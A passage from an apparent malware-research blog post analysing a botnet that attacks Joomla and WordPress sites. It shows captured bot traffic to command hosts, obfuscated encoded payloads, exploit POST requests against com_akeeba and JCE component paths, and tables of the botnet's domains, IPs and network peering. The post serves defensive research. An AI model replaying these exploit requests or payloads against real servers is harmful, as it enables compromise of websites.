<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Connection: keep-alive</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Keep-Alive: timeout=20</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">ETag: "51929ccd-18000"</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Accept-Ranges: bytes</span></span></div>
<br />
<span style="font-family: inherit;"><span style="line-height: 22.84375px;">3. </span></span><span style="line-height: 22.84375px;"> Next, our bot sends a GET request, <b>"/img/seek.cgi?lin=100&db=ndb</b>" to <b>"seek4.run-stat.org"</b> on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php </span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="background-color: #eff8fb; color: black; height: 200px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
<span style="line-height: 22.84375px;">GET /ae1.php HTTP/1.1</span><br />
<span style="line-height: 22.84375px;">Accept: */*</span><br />
<span style="line-height: 22.84375px;">User-Agent: Mozilla/5.0</span><br />
<span style="line-height: 22.84375px;">Host: bt.ads-runner.org</span><br />
<span style="line-height: 22.84375px;">Connection: Keep-Alive</span><br />
<span style="line-height: 22.84375px;">Cache-Control: no-cache</span><br />
<span style="line-height: 22.84375px;"><br /></span>
<span style="line-height: 22.84375px;">HTTP/1.1 200 OKServer: nginx</span><br />
<span style="line-height: 22.84375px;">Date: Mon, 27 May 2013 03:27:15 GMT</span><br />
<span style="line-height: 22.84375px;">Content-Type: text/plain; charset=iso-8859-1</span><br />
<span style="line-height: 22.84375px;">Content-Length: 373</span><br />
<span style="line-height: 22.84375px;">Connection: close</span><br />
<span style="line-height: 22.84375px;">Vary: Accept-Encoding</span><br />
<span style="line-height: 22.84375px;">Last-Modified: Mon, 27 May 2013 03:27:15 GMT</span><br />
<span style="line-height: 22.84375px;">Accept-Ranges: bytes</span><br />
<span style="line-height: 22.84375px;">PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX</span><br />
<span style="line-height: 22.84375px;">QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx</span><br />
<span style="line-height: 22.84375px;">Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh</span><br />
<span style="line-height: 22.84375px;">bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk</span><br />
<span style="line-height: 22.84375px;">ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==</span><br />
<div style="font-family: inherit; line-height: 22.84375px;">
<br /></div>
</div>
<span style="line-height: 22.84375px;">There were several PHP scripts observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server. <a href="http://www.deependresearch.org/p/file-sm14e.html">We link here to the PHP scripts we saw in use this malware.</a> The presence of any of these scripts on a CMS webserver is a good indication of compromise.</span><br />
<br />
<span style="line-height: 22.84375px;">4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.</span><br />
<div style="background-color: #eff8fb; color: black; height: 200px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
<span style="line-height: 22.84375px;">GET /ggu.php HTTP/1.1</span><br />
<span style="line-height: 22.84375px;">Accept: */*</span><br />
<span style="line-height: 22.84375px;">User-Agent: Mozilla/5.0</span><br />
<span style="line-height: 22.84375px;">Host: fw.point-up.org</span><br />
<span style="line-height: 22.84375px;">Connection: Keep-Alive</span><br />
<span style="line-height: 22.84375px;">Cache-Control: no-cache</span><br />
<span style="line-height: 22.84375px;"><br /></span>
<span style="line-height: 22.84375px;">HTTP/1.1 200 OK</span><br />
<span style="line-height: 22.84375px;">Server: nginx</span><br />
<span style="line-height: 22.84375px;">Date: Mon, 27 May 2013 03:27:16 GMT</span><br />
<span style="line-height: 22.84375px;">Content-Type: text/html</span><br />
<span style="line-height: 22.84375px;">Transfer-Encoding: chunked</span><br />
<span style="line-height: 22.84375px;">Connection: keep-alive</span><br />
<span style="line-height: 22.84375px;">Keep-Alive: timeout=20</span><br />
<span style="line-height: 22.84375px;">Vary: Accept-Encoding</span><br />
<span style="line-height: 22.84375px;">41</span><br />
<span style="line-height: 22.84375px;">http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php</span><br />
<span style="line-height: 22.84375px;">0</span><br />
<div>
<br /></div>
</div>
</div>
</div>
<span style="font-family: inherit; line-height: 19.984375px;"><br /></span>
<span style="font-family: inherit; line-height: 19.984375px;">We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits. After receiving the target URL from the server on </span><span style="font-family: inherit; line-height: 19.984375px;"><b style="font-style: italic;">fw.point-up.org, </b>the bot will attempt exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:</span><br />
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-rDCGiwySicNxD10tl8BOxLI8FZ0QKpEdIznyGHzzs-aax_OcsE_aLX2sqMz_AyF9c8ygY0Or3Jze-lyDSp7w2xssgHpcukdautAvx80aBCv3q1BjqrWpjjgA_NgDbRFrhpnAxCIvFgY/s1600/victims.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-rDCGiwySicNxD10tl8BOxLI8FZ0QKpEdIznyGHzzs-aax_OcsE_aLX2sqMz_AyF9c8ygY0Or3Jze-lyDSp7w2xssgHpcukdautAvx80aBCv3q1BjqrWpjjgA_NgDbRFrhpnAxCIvFgY/s640/victims.png" height="497" sss="" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">List of URLs from fw.point-up.org</span></td></tr>
</tbody></table>
<span style="font-family: inherit; line-height: 19.984375px;">The server response varies depending on the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.</span></blockquote>
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encoded<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 Host: [redacted].com<br />
Content-Length: 439<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache <br />
<br />
lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ== <br />
<br />
HTTP/1.1 200 OK<br />
Date: Mon, 27 May 2013 03:27:21 GMT<br />
Server: Apache X-Powered-By: PHP/5.2.14<br />
Connection: close<br />
Transfer-Encoding: chunked<br />
Content-Type: text/html <br />
<br />
OKe807f1fcf82d132f9bb018ca6738a19f+0</div>
<br />
2. Not Allowed = Host not vulnerable<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /plugins/editors/jce/libraries/classes/json/defines.php<br />
HTTP/1.1 Accept: */*<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 Host: www.[redacted].org<br />
Content-Length: 506 Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR <br />
<br />
HTTP/1.1<br />
406 Not Acceptable<br />
Date: Mon, 27 May 2013 03:27:21 GMT<br />
Server: Apache<br />
Content-Length: 226<br />
Keep-Alive: timeout=5, max=75<br />
Connection: Keep-Alive<br />
Content-Type: text/html; charset=iso-8859-1 <br />
<br />
<head><title>Not Acceptable!</title></head><body><h1>
Not Acceptable!</h1>
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</body></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NYaXIj9a345xtUZ5PxhMUXXiOSuFT5hXWbmjEqheqUgLqZSfLS9zHmHIBT1rUtfbB0dzkmpS9gaWMCH5MBK7D-vM4UBesk0u1lYI9GbblmR6b9ARh4u84ZZHREPEXza2oWexexJv9gYm/s1600/code1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NYaXIj9a345xtUZ5PxhMUXXiOSuFT5hXWbmjEqheqUgLqZSfLS9zHmHIBT1rUtfbB0dzkmpS9gaWMCH5MBK7D-vM4UBesk0u1lYI9GbblmR6b9ARh4u84ZZHREPEXza2oWexexJv9gYm/s1600/code1.png" height="40" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic824e68TIhPmSD_sxmWq5RMzFrqoclYO7xUShEeclq8sMUjpv6Ha0L7C9obWZbYeG9GdpW-1K0atTIWGuFXQ4w4Utx9Kp8mCQ-aH2EeLabTHE9O4PqYiEY9-_SqehUM6LsY0LsPZCusco/s1600/code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic824e68TIhPmSD_sxmWq5RMzFrqoclYO7xUShEeclq8sMUjpv6Ha0L7C9obWZbYeG9GdpW-1K0atTIWGuFXQ4w4Utx9Kp8mCQ-aH2EeLabTHE9O4PqYiEY9-_SqehUM6LsY0LsPZCusco/s1600/code.png" height="85" width="640" /></a></div>
<br />
<br />
<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php<br />
HTTP/1.1<br />
Accept: */*<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0<br />
Host: www.[redacted].com<br />
Content-Length: 506<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache <br />
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR <br />
<br />
HTTP/1.1 200 OK<br />
Date: Mon, 27 May 2013 03:27:20 GMT<br />
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1<br />
Keep-Alive: timeout=15, max=100<br />
Connection: Keep-Alive</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8AZj3ksilqKdQN11wvaVmYe-bMKfRubWm3ZasAetKzQ-rj9ylb6JB35FcPeRbjN6tWlFYer6XS8xc750fjnAJs8RMMwYYJ7GARBxPR-nA2WC1QoTFVn4cSgeB54l57e3YBNLY-gXojBQa/s1600/code3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8AZj3ksilqKdQN11wvaVmYe-bMKfRubWm3ZasAetKzQ-rj9ylb6JB35FcPeRbjN6tWlFYer6XS8xc750fjnAJs8RMMwYYJ7GARBxPR-nA2WC1QoTFVn4cSgeB54l57e3YBNLY-gXojBQa/s1600/code3.png" height="45" width="640" /></a></div>
<h2 style="text-align: left;">
<span style="font-family: inherit; line-height: 19.984375px;"><b><br /></b></span></h2>
<h2 style="text-align: left;">
<span style="font-family: inherit; line-height: 19.984375px;"><b><br /></b></span></h2>
<h2 style="text-align: left;">
<span style="font-family: inherit; line-height: 19.984375px;"><b>Hosting Infrastructure </b></span></h2>
<span style="font-family: inherit; line-height: 19.984375px;">The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure</span><br />
<span style="font-family: inherit;"><span style="line-height: 19.984375px;"><br />
</span> </span><br />
<table border="1" cellpadding="10"><tbody>
<tr> <th><span style="font-family: inherit;">Domain</span></th> <th><span style="font-family: inherit;">IP Address</span></th> <th><span style="font-family: inherit;">ASN</span></th> <th><span style="font-family: inherit;">Network Name</span></th> </tr>
<tr> <td><span style="font-family: inherit;">wholists.org </span></td> <td><span style="font-family: inherit;">95.163.104.69 </span></td> <td><span style="font-family: inherit;">AS12695 </span></td> <td><span style="font-family: inherit;">Digital Networks CJSC </span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 18.5625px;">gettrial.store-apps.org</span></td> <td><span style="font-family: inherit; line-height: 19.984375px;">95.163.104.94</span></td> <td><span style="font-family: inherit;">AS12695 </span></td> <td><span style="font-family: inherit;">Digital Networks CJSC </span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 19.984375px;">t22.run-stat.org</span></td> <td><span style="font-family: inherit;">95.163.104.69 </span></td> <td><span style="font-family: inherit;">AS12695 </span></td> <td><span style="font-family: inherit;">Digital Networks CJSC </span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 19.984375px;">seek4.run-stat.org</span></td> <td><span style="font-family: inherit; line-height: 19.984375px;">46.165.230.185</span></td> <td><span style="font-family: inherit;">AS16265</span></td> <td><span style="font-family: inherit;">Leaseweb</span></td></tr>
<tr> <td><span style="font-family: inherit;">bt.ads-runner.org </span></td> <td><span style="font-family: inherit;">208.115.109.53</span></td> <td><span style="font-family: inherit;">AS23033</span></td> <td><span style="font-family: inherit;">Wowrack</span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 19.984375px;">fw.point-up.org</span></td> <td><span style="font-family: inherit;">85.143.166.221</span></td> <td><span style="font-family: inherit;">AS56534</span></td> <td><span style="font-family: inherit;">PIRIX-CORPNET-2</span></td></tr>
</tbody></table>
<div style="border: 0px; margin: 0px; padding: 0px; text-align: center;">
<span style="font-family: inherit;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="font-family: inherit; font-size: small;">
Passive DNS</span></h3>
<table border="1" cellpadding="5"><tbody>
<tr> <th><span style="font-family: inherit;">95.163.104.69</span></th> <th><span style="font-family: inherit;">95.163.104.94</span></th> <th><span style="font-family: inherit;">46.165.230.185</span></th> <th><span style="font-family: inherit;">208.115.109.53</span></th><th><span style="font-family: inherit;">85.143.166.221</span></th></tr>
<tr> <td><span style="font-family: inherit;">www.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.upsave.info</span></td> <td><span style="font-family: inherit;">ntp.run-stat.org</span></td><td><span style="font-family: inherit;">fw.point-up.org</span></td></tr>
<tr> <td><span style="font-family: inherit;">bns.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.store-apps.org</span></td> <td><span style="font-family: inherit;">fw.stat-run.info</span></td> <td><span style="font-family: inherit;">bt.ads-runner.org</span></td><td><span style="font-family: inherit;">ns2.memrem.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">gjd.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.games-olympic.org</span></td> <td><span style="font-family: inherit;">fw.run-stat.org</span></td> <td><span style="font-family: inherit;">sk4.ads-runner.org</span></td><td><span style="font-family: inherit;">ns2.nalkanet.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">lbh.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.googleminiapi.com</span></td> <td><span style="font-family: inherit;">mail.stat-run.info</span></td> <td><span style="font-family: inherit;">ntp.stat-run.info</span></td><td><span style="font-family: inherit;">ns2.nallanite.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">qdp.wholists.org</span></td> <td><span style="font-family: inherit;">peace.vijproject.com</span></td> <td><span style="font-family: inherit;">bt2.run-stat.org</span></td> <td><span style="font-family: inherit;"><br /></span></td><td><span style="font-family: inherit;">vm.clodoserver.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">www.techsign.org</span></td> <td><span style="font-family: inherit;">sogood.vitaminavip.com</span></td> <td><span style="font-family: inherit;">jc.upsave.info</span></td> <td><span style="font-family: inherit;"><br /></span></td><td><span style="font-family: inherit;"><br /></span></td></tr>
<tr> <td><span style="font-family: inherit;">ml.inviteyou.info</span></td> <td><span style="font-family: inherit;">img.stat-run.info</span></td> <td><span style="font-family: inherit;">ju.upsave.info</span></td><td><span style="font-family: inherit;"><br /></span></td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span>
<br />
<div style="text-align: center;">
<i><span style="font-family: inherit;">Passive DNS data courtesy of <a href="https://sie.isc.org/About_ISC_Security/">ISC SIE</a></span></i></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<h3 style="text-align: left;">
<span style="font-family: inherit; font-size: small;">
Routing and Peers</span></h3>
<div style="text-align: left;">
<span style="font-family: inherit;">The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers. </span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: left;">
<b><u><span style="font-family: inherit;"><span style="text-align: center;">95.163.104.69 & </span><span style="text-align: center;">95.163.104.94</span><span style="text-align: center;">- ASN12695 - </span>Digital Networks CJSC (DINET)</span></u></b></div>
<div style="text-align: left;">
<span style="font-family: inherit; font-weight: bold; text-align: center;"><br />
</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: right;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJa50gNhSpxJYSahUrAazSz7oGitHCJ_XRhFo915t5ep82Vlu1Lg50csfMuJqInAVmC4UCD6fTmCLn3nBuq2JjjehVIe1T816QffMJ49sPVeuXjz3WlrVpHhJsFfZ9eRgZWqkvofEzPe4/s1600/asn12695_jan2013.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJa50gNhSpxJYSahUrAazSz7oGitHCJ_XRhFo915t5ep82Vlu1Lg50csfMuJqInAVmC4UCD6fTmCLn3nBuq2JjjehVIe1T816QffMJ49sPVeuXjz3WlrVpHhJsFfZ9eRgZWqkvofEzPe4/s320/asn12695_jan2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS12695 - January, 2013</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXVgTCnkKyXxKUy_aHRlAx0PCqupjlT2br7GxdOedf-jsSJhAwPqKQZJgFGyFxRIGbMI37PF5EG8L3uwVoVEC489oKKpXFqHnY2MCZ5m6-7gA4hvVt01Q2kpR0os1gifoabLMfBO0rVTU/s1600/asn12695_may2013.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXVgTCnkKyXxKUy_aHRlAx0PCqupjlT2br7GxdOedf-jsSJhAwPqKQZJgFGyFxRIGbMI37PF5EG8L3uwVoVEC489oKKpXFqHnY2MCZ5m6-7gA4hvVt01Q2kpR0os1gifoabLMfBO0rVTU/s320/asn12695_may2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS12695 - May, 2013</span></td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><span style="text-align: left;"><br />
</span> </span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">AS3216 - SOVAM-AS OJSC _Vimpelcom</span><br />
<span style="font-family: inherit;">AS8657 - CPRM PT Comunicacoes S A</span><br />
<span style="font-family: inherit;">AS31133 - MF-MGSM-AS OJSC MegaFon</span><br />
<a href="http://www.cidr-report.org/cgi-bin/as-report?as=as12695&view=2.0"><span style="font-family: inherit;">CIDR Report for AS12695</span></a><br />
<span style="font-family: inherit;"><span style="font-weight: bold; text-align: center;"><br />
</span> <span style="font-weight: bold; text-align: center;"><br />
</span> <span style="font-weight: bold; text-align: center;"><br />
</span> <b><u><span style="text-align: center;">208.115.109.53 - AS</span>23033 - WowRack</u></b></span><br />
<span style="font-family: inherit;"><b><u><br />
</u></b> </span><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicjEIXK2EOW-jpI7VgiQkmFyIqokLYLve2TxPn-rXH-pntFgpa3hPIX1wczcwUMcBH5tkXFhjWTY52x-2Ny-yu6-nZIVd6U1asK1zu0bb_zEjMeUti3ClcjIckQ1uMan9z6I2CP6o7xs/s1600/asn23033_jan2013.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicjEIXK2EOW-jpI7VgiQkmFyIqokLYLve2TxPn-rXH-pntFgpa3hPIX1wczcwUMcBH5tkXFhjWTY52x-2Ny-yu6-nZIVd6U1asK1zu0bb_zEjMeUti3ClcjIckQ1uMan9z6I2CP6o7xs/s320/asn23033_jan2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS23033 - January, 2013</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDD7DwYBQbBrTrqsz35uvglRJ0zNziZgzU1MwtUumFKmYHlvD4ivlUmxkiG_hTa22X7Du-WD7z66mhNuFAfoIRR3c6yaVwEfSl0WZ3CGldqWtHlokByQMaC-VeDnd40jU1lMvpQOWH6UM/s1600/asn23033_may2013.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDD7DwYBQbBrTrqsz35uvglRJ0zNziZgzU1MwtUumFKmYHlvD4ivlUmxkiG_hTa22X7Du-WD7z66mhNuFAfoIRR3c6yaVwEfSl0WZ3CGldqWtHlokByQMaC-VeDnd40jU1lMvpQOWH6UM/s320/asn23033_may2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS23033 - May, 2013</span></td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.</span><br />
<a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS23033&view=2.0"><span style="font-family: inherit;">CIDR Report for AS23033</span></a><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<b><u><span style="font-family: inherit;">85.143.166.221 - AS56534 - PIRIX-CORPNET-2</span></u></b><br />
<span style="font-family: inherit;"><b><u><br />
</u></b> </span><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqBASAgxPCvukuaIrwQ4xQaJWbwS33SJBSWxyBMRT_PiwVuAaMUh3mKvnHkJ-XLGRmbCXb-ratSC4xq_wQmJyYSHPeyhAFUYYvDIL-Emf1vMblQHIV2tpKhMLfJYBP-KRF6i1wbe0J0rU/s1600/asn56534_jan2013.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqBASAgxPCvukuaIrwQ4xQaJWbwS33SJBSWxyBMRT_PiwVuAaMUh3mKvnHkJ-XLGRmbCXb-ratSC4xq_wQmJyYSHPeyhAFUYYvDIL-Emf1vMblQHIV2tpKhMLfJYBP-KRF6i1wbe0J0rU/s320/asn56534_jan2013.png" height="260" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS56534 - January, 2013</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
